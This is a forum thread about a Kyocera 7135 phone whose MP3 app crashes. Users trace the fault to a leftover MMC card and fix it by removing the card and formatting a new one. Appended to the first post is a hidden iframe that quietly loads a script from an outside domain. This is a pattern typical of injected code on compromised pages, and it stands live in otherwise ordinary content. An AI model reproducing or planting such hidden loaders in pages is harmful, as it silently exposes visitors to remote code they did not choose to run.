+ Reply to Thread

MP3 Fatal Error!!!

I just got my 7135 from Verizon. Love It. When I tap the MP3 app, I get a fatal error. I have to do a soft reset. I called Kyocera, they had me perform several Hard Resets, but it did not solve the problem. They said I need to take it to Verizon to get flashed, or mail it to them. Verizon stores can't flash it yet, and tech support tells me to mail the phone back for a new one. I really don't want to part with my new phone. My sales rep told me he will replace it in the store on April 28.

Anyone else have this problem?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I did, but only because I had an MMC card in the slot (in my case, Rand McNally Road Atlas). When I popped it out, I could *look* at the MP3 app, but until I actually got an SD card (and, of course, dropped some MP3's on it) it wasn't all that fascinating. You haven't perchance been able to put a blank SD card in it and try it out yet, have you?

I've used a cheapo MMC card to listen to MP3s on mine. No problems with the MP3 player locking up. Also, it's best to format new cards with the phone.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

It works

I actually had a dicitionary card in the phone. After I took it out, no more problems. I inserted a blank card and formated it. It seems to work.

Thanks for your help

Glad that it all worked out for ya'. And by the way, welcome to this forum and the wonderful world of the 7135!
    ~'kito
    pdaPhoneHome Moderator